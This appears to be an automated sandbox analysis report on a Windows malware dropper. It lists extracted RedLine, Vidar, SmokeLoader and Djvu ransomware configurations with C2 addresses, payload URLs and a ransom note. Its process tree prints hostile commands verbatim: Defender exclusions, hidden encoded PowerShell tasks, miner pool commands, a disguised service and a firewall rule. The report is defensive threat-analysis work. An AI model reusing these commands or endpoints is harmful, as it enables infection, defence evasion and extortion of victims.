Analysis

  • max time kernel
    103s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    13-03-2022 17:46

General

  • Target

    f0c557ea5848b98eec5e7a023aacfe8703ca65e70cdacec56b9479e77ff08a98.exe

  • Size

    3.2MB

  • MD5

    a7a72b35a52027419a7cba8fd1c28094

  • SHA1

    fdbf3ea876bf57e70a9f5e7d83d19b7e9240c979

  • SHA256

    f0c557ea5848b98eec5e7a023aacfe8703ca65e70cdacec56b9479e77ff08a98

  • SHA512

    86d4610b0da2b9f2913895e035478534fc35e527b751b10fef1e4cfe13581aaf41e36d882fbc678d1443df08c1fd31a89cd19248d90615028df431580a2de7ae

Malware Config

Extracted

Family

redline

Botnet

DomAni2

C2

flestriche.xyz:80

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

ruzki000

C2

86.107.197.196:63065

Attributes
  • auth_value

    80fac7f67bd38aa709bbeef7a44ccb47

Extracted

Family

redline

Botnet

pizzadlyashekera

C2

65.108.101.231:14648

Attributes
  • auth_value

    7d6b3cb15fc835e113d8c22bd7cfe2b4

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

ruzki12_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

redline

Botnet

Installs

C2

94.23.1.92:12857

Attributes
  • auth_value

    c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 41 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 9 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 42 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 20 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f0c557ea5848b98eec5e7a023aacfe8703ca65e70cdacec56b9479e77ff08a98.exe
    "C:\Users\Admin\AppData\Local\Temp\f0c557ea5848b98eec5e7a023aacfe8703ca65e70cdacec56b9479e77ff08a98.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c arnatic_1.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4756
        • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_1.exe
          arnatic_1.exe
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:3752
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3752 -s 1032
            5⤵
            • Program crash
            PID:5020
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c arnatic_2.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_2.exe
          arnatic_2.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:4556
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c arnatic_6.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1848
        • C:\Users\Admin\AppData\Local\Temp\7zSCC7C7E5D\arnatic_6.exe
          arnatic_6.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          PID:4808
          • C:\Users\Admin\Documents\m7hCdX8sGOE23rsbPoefBCGo.exe
            "C:\Users\Admin\Documents\m7hCdX8sGOE23rsbPoefBCGo.exe"
            5⤵
            • Executes dropped EXE
            PID:3672
            • C:\Users\Admin\AppData\Roaming\program5214\program5214.exe
              "C:\Users\Admin\AppData\Roaming\program5214\program5214.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4776
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 2624
                7⤵
                • Program crash
                PID:4736
          • C:\Users\Admin\Documents\DWwgcqB5NMhlFFRhrzrvGN_4.exe
            "C:\Users\Admin\Documents\DWwgcqB5NMhlFFRhrzrvGN_4.exe"
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:3932
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
              6⤵
                PID:5016
                • C:\Windows\SysWOW64\cmd.exe
                  cmd
                  7⤵
                    PID:2984
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist /FI "imagename eq BullGuardCore.exe"
                      8⤵
                      • Enumerates processes with tasklist
                      PID:2216
                    • C:\Windows\SysWOW64\find.exe
                      find /I /N "bullguardcore.exe"
                      8⤵
                        PID:1992
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist /FI "imagename eq PSUAService.exe"
                        8⤵
                        • Enumerates processes with tasklist
                        PID:228
                      • C:\Windows\SysWOW64\find.exe
                        find /I /N "psuaservice.exe"
                        8⤵
                          PID:4232
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                          8⤵
                            PID:3356
                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                            Accostarmi.exe.pif N
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:3560
                    • C:\Users\Admin\Documents\da6E2Redzb8UYdOAdTbUvf4k.exe
                      "C:\Users\Admin\Documents\da6E2Redzb8UYdOAdTbUvf4k.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:3668
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3668 -s 432
                        6⤵
                        • Program crash
                        PID:4332
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3668 -s 440
                        6⤵
                        • Program crash
                        PID:3020
                    • C:\Users\Admin\Documents\E09JyxFfy_Nak4l6I4L25m4_.exe
                      "C:\Users\Admin\Documents\E09JyxFfy_Nak4l6I4L25m4_.exe"
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      PID:1260
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 624
                        6⤵
                        • Program crash
                        PID:1516
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 632
                        6⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Suspicious use of SetThreadContext
                        • Program crash
                        PID:1032
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 676
                        6⤵
                        • Program crash
                        PID:2116
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 832
                        6⤵
                        • Program crash
                        PID:4808
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 800
                        6⤵
                        • Program crash
                        PID:4048
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 1212
                        6⤵
                        • Adds Run key to start application
                        • Program crash
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3672
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 1304
                        6⤵
                        • Program crash
                        PID:388
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im "E09JyxFfy_Nak4l6I4L25m4_.exe" /f & erase "C:\Users\Admin\Documents\E09JyxFfy_Nak4l6I4L25m4_.exe" & exit
                        6⤵
                          PID:1428
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im "E09JyxFfy_Nak4l6I4L25m4_.exe" /f
                            7⤵
                            • Kills process with taskkill
                            PID:3020
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 1320
                          6⤵
                          • Program crash
                          PID:4104
                      • C:\Users\Admin\Documents\Kv9XRj6cQ1JiaYADqfAH7np3.exe
                        "C:\Users\Admin\Documents\Kv9XRj6cQ1JiaYADqfAH7np3.exe"
                        5⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of SetThreadContext
                        PID:3316
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                          6⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3648
                          • C:\Users\Admin\AppData\Local\Temp\test.exe
                            "C:\Users\Admin\AppData\Local\Temp\test.exe"
                            7⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of SetThreadContext
                            PID:5004
                            • C:\Windows\bfsvc.exe
                              C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user UQBoMIYmX6zYTKyRLaph1PjCMfxSLWTbiAw_qqTHLnbMhzWF
                              8⤵
                                PID:4736
                              • C:\Windows\notepad.exe
                                C:\Windows\notepad.exe --coin=XMR -o xmr-eu1.nanopool.org:14444 -u 44W9eLcymm66Eie5AyD11jYW1DaJ4GTHzZEu1QELPGS3U9vKtWEyUCaCFwhn4af8zjeQ2MWeuLgCVDTjAjiGUbyYAtQBvC1 -p 10k instllov
                                8⤵
                                  PID:1728
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -u -p 1728 -s 416
                                    9⤵
                                    • Program crash
                                    PID:2520
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "new" "ton"
                                  8⤵
                                    PID:1804
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      9⤵
                                        PID:1936
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 1804 -s 232
                                        9⤵
                                        • Program crash
                                        PID:4924
                              • C:\Users\Admin\Documents\YWqi6BgUw9NgywDzliZdsBBW.exe
                                "C:\Users\Admin\Documents\YWqi6BgUw9NgywDzliZdsBBW.exe"
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4804
                                • C:\Users\Admin\AppData\Local\Temp\feb1c5a2-4df7-45d2-9875-e1113e799fbe.exe
                                  "C:\Users\Admin\AppData\Local\Temp\feb1c5a2-4df7-45d2-9875-e1113e799fbe.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks processor information in registry
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4472
                              • C:\Users\Admin\Documents\dIninmZeMUDyJOveqA9icNJf.exe
                                "C:\Users\Admin\Documents\dIninmZeMUDyJOveqA9icNJf.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:2912
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 896
                                  6⤵
                                  • Program crash
                                  PID:4048
                              • C:\Users\Admin\Documents\4gY7oXtIoSNu93lsel_1w411.exe
                                "C:\Users\Admin\Documents\4gY7oXtIoSNu93lsel_1w411.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1440
                              • C:\Users\Admin\Documents\1bQwfWXYE5mtlRw_meepDoVh.exe
                                "C:\Users\Admin\Documents\1bQwfWXYE5mtlRw_meepDoVh.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:3536
                                • C:\Users\Admin\AppData\Local\Temp\7zSC188.tmp\Install.exe
                                  .\Install.exe
                                  6⤵
                                  • Executes dropped EXE
                                  PID:376
                                  • C:\Users\Admin\AppData\Local\Temp\7zSD82D.tmp\Install.exe
                                    .\Install.exe /S /site_id "525403"
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks computer location settings
                                    • Drops file in System32 directory
                                    • Enumerates system info in registry
                                    PID:5044
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:1900
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                        9⤵
                                          PID:1728
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                            10⤵
                                              PID:1248
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                              10⤵
                                                PID:4540
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                            8⤵
                                              PID:3600
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                9⤵
                                                  PID:2216
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                    10⤵
                                                      PID:1964
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                      10⤵
                                                        PID:2612
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "gNhSXkrnb" /SC once /ST 00:06:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                    8⤵
                                                    • Creates scheduled task(s)
                                                    PID:2204
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /run /I /tn "gNhSXkrnb"
                                                    8⤵
                                                      PID:2776
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:2000
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /DELETE /F /TN "gNhSXkrnb"
                                                      8⤵
                                                        PID:2364
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\kTCMygy.exe\" j6 /site_id 525403 /S" /V1 /F
                                                        8⤵
                                                        • Creates scheduled task(s)
                                                        PID:4148
                                                • C:\Users\Admin\Documents\ESv1OFv4y1pvLXIU0OXXKngA.exe
                                                  "C:\Users\Admin\Documents\ESv1OFv4y1pvLXIU0OXXKngA.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Checks computer location settings
                                                  PID:4976
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\efomexnt\
                                                    6⤵
                                                      PID:4812
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\dgwvoqxa.exe" C:\Windows\SysWOW64\efomexnt\
                                                      6⤵
                                                        PID:2012
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "C:\Windows\System32\sc.exe" create efomexnt binPath= "C:\Windows\SysWOW64\efomexnt\dgwvoqxa.exe /d\"C:\Users\Admin\Documents\ESv1OFv4y1pvLXIU0OXXKngA.exe\"" type= own start= auto DisplayName= "wifi support"
                                                        6⤵
                                                          PID:2372
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          "C:\Windows\System32\sc.exe" description efomexnt "wifi internet conection"
                                                          6⤵
                                                            PID:2092
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" start efomexnt
                                                            6⤵
                                                              PID:4168
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                              6⤵
                                                                PID:2844
                                                            • C:\Users\Admin\Documents\Ws17o1lRntXPb_pr8PqyeWeZ.exe
                                                              "C:\Users\Admin\Documents\Ws17o1lRntXPb_pr8PqyeWeZ.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Checks computer location settings
                                                              • Adds Run key to start application
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1152
                                                              • C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Checks SCSI registry key(s)
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:5020
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                6⤵
                                                                  PID:2948
                                                              • C:\Users\Admin\Documents\rq4uawQ8lPOr9bMNuMVmEfao.exe
                                                                "C:\Users\Admin\Documents\rq4uawQ8lPOr9bMNuMVmEfao.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of SetThreadContext
                                                                PID:4284
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                  6⤵
                                                                    PID:3632
                                                                • C:\Users\Admin\Documents\QOAojhVqJWojjjh6FRn4rqu6.exe
                                                                  "C:\Users\Admin\Documents\QOAojhVqJWojjjh6FRn4rqu6.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:1724
                                                                • C:\Users\Admin\Documents\lki3QL2JsDz6AoGc2ktufEwc.exe
                                                                  "C:\Users\Admin\Documents\lki3QL2JsDz6AoGc2ktufEwc.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • Checks processor information in registry
                                                                  PID:4888
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                    6⤵
                                                                    • Blocklisted process makes network request
                                                                    PID:5012
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                    6⤵
                                                                    • Checks processor information in registry
                                                                    • Modifies registry class
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:4056
                                                                • C:\Users\Admin\Documents\trnLQrwT4y7yKJlM7xm_rb3z.exe
                                                                  "C:\Users\Admin\Documents\trnLQrwT4y7yKJlM7xm_rb3z.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:2620
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                    6⤵
                                                                      PID:1312
                                                                  • C:\Users\Admin\Documents\08ALLWb1u6PjiSFtQZWXcMgh.exe
                                                                    "C:\Users\Admin\Documents\08ALLWb1u6PjiSFtQZWXcMgh.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:4520
                                                                  • C:\Users\Admin\Documents\tIUw_DKdzKzU8NSBwGrdapeS.exe
                                                                    "C:\Users\Admin\Documents\tIUw_DKdzKzU8NSBwGrdapeS.exe"
                                                                    5⤵
                                                                      PID:1900
                                                                      • C:\Users\Admin\Documents\tIUw_DKdzKzU8NSBwGrdapeS.exe
                                                                        "C:\Users\Admin\Documents\tIUw_DKdzKzU8NSBwGrdapeS.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:4672
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 536
                                                                          7⤵
                                                                          • Program crash
                                                                          PID:5008
                                                                    • C:\Users\Admin\Documents\xka0pibaitJxcK1FD5sNaeux.exe
                                                                      "C:\Users\Admin\Documents\xka0pibaitJxcK1FD5sNaeux.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4732
                                                                    • C:\Users\Admin\Documents\eRzWl6iaJHG7uQjJjLchwstd.exe
                                                                      "C:\Users\Admin\Documents\eRzWl6iaJHG7uQjJjLchwstd.exe"
                                                                      5⤵
                                                                        PID:2000
                                                                        • C:\Windows\SysWOW64\cmd.exe
